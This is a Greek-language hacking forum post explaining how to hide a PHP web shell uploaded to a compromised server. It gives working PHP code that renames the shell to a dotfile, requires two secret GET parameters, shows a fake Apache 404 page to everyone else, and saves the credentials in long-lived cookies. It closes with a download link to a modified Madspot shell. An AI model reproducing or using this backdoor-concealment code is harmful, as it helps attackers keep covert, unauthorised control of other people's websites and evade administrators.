Γεια σας!
Σήμερα θα σας δείξω μερικά βήματα έτσι ώστε να κάνετε (σχεδόν) αόρατο το shell σας που πιθανώς έχετε ανεβάσει κάπου![hide]1. Κάνουμε rename το shell μας σε μορφή .onoma.php πχ αν ήταν: shell.php το κάνουμε .shell.php έτσι ώστε να μην εμφανίζεται με την εντολή ls σκέτη.
2. Λοιπόν εδώ θεωρούμε 2 κωδικούς τους οποίους ξέρουμε μόνο εμείς.
Εγώ θα χρησιμοποιήσω τους κωδικούς: pass1 και pass2
Ανοίγουμε το php shell μας και ορίζουμε τις μεταβλητές με τον κωδικό μας πάνω πάνω:
$p1 = "pass1";
$p2 = "pass2";
Στο shell αν δεν είναι της μορφής server.com/.shell.php?pass1=pass2 θα πετάει 404 error έτσι ώστε να μην καταλάβει κανείς τίποτα..δηλαδή αν πάει να μπει κάποιος έτσι: server.com/shell.php θα του πετάξει 404 error.Αυτό θα γίνει μέσω php, πάμε και γράφουμε λίγο php κώδικα:
if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) {
//Kwdikas tou shell edw
} else {
//Edw einai o kwdikas gia to 404 Not Found?>
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?echo $_SERVER['SCRIPT_NAME']?> was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address>
</body></html>
<?}?>
Επειδή όμως σε μερικά shell ίσως να μην υπάρχει ομαλή λειτουργία(μπορεί όταν πατάνε πχ το κουμπί για την επεξεργασία ή προβολή αρχείου να <<βγαίνει>> το &p1=pass1&p2=pass2 απ το λινκ μας(δηλαδη η ταυτοποιηση του κωδικου μας) με αποτέλεσμα να μας πετάει πάλι στο 404 Not Found, θα προστέσουμε λίγο ακόμα κώδικα έτσι ώστε να μπαίνουν σε cookie οι κωδικοί και να μην ξαναχρειαστεί να τους βάλουμε στο link.Έτσι λοιπόν προσθέτουμε μετά το if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { τον εξής κώδικα:
if($_COOKIE['p1'] != $p1) {
//Dhladh an o xrhsths auth thn stigmh exei tous kwdikous sto link kai oxi se cookie
setcookie("p1",$_GET['p1'], time() + (10 * 365 * 24 * 60 * 60));
setcookie("p2",$_GET['p2'], time() + (10 * 365 * 24 * 60 * 60));
}και ύστερα κάνουμε μια τροποποίηση στην if() έτσι ώστε να ελέγχει για cookie εναλλακτικά(αν δεν υπάρχουν οι κωδικοί στο link):
if(($_GET['p1'] == $p1 && $_GET['p2'] == $p2) || ($_COOKIE['p1'] == $p1 && $_COOKIE['p2'] == $p2)) {
και τέλος!Ας κάνουμε έναν έλεγχο..
Link: .madspot.php:
404 error και λογικό αφού δεν έχουμε βάλει κωδικο..
Link: .madspot.php?p1=pass1&p2=pass2
Τώρα αφού βάλαμε τους κωδικούς φόρτωσε το shell και ταυτόχρονα πέρασε τους κωδικούς μας σε cookie, πάμε να δοκιμάσουμε πάλι σκέτο link:
Link: .madspot.php(μετά απ' το όρισμα των κωδικών):
Τώρα βλέπουμε πως λειτουργεί κανονικά αφού έχουν οριστεί σε cookie οι κωδικοί μας και δεν χρειάζεται πλέον να τους βάζουμε στο link.
Screenshot από τον server εκτελόντας την εντολή ls:
Όπως βλέπετε με την εντολή ls σκέτη δεν εμφανίζεται το shell αφού ξεκινάει από . (κρυφό αρχείο)
Αυτό ήταν!
Αν σας μπέρδεψα μπορείτε να κατεβάσετε μια έτοιμη τροποποίηση που έκανα στο Madspot Shell:
http://www.mediafire.com/download/dcgj5eh360rg3s4/modified_madspot_kwnos100.rar
[/hide]Η μέθοδος είναι δικιά μου και ανήκει στο GreekHacking.com
Ότι απορία έχετε αφήστε σχόλιο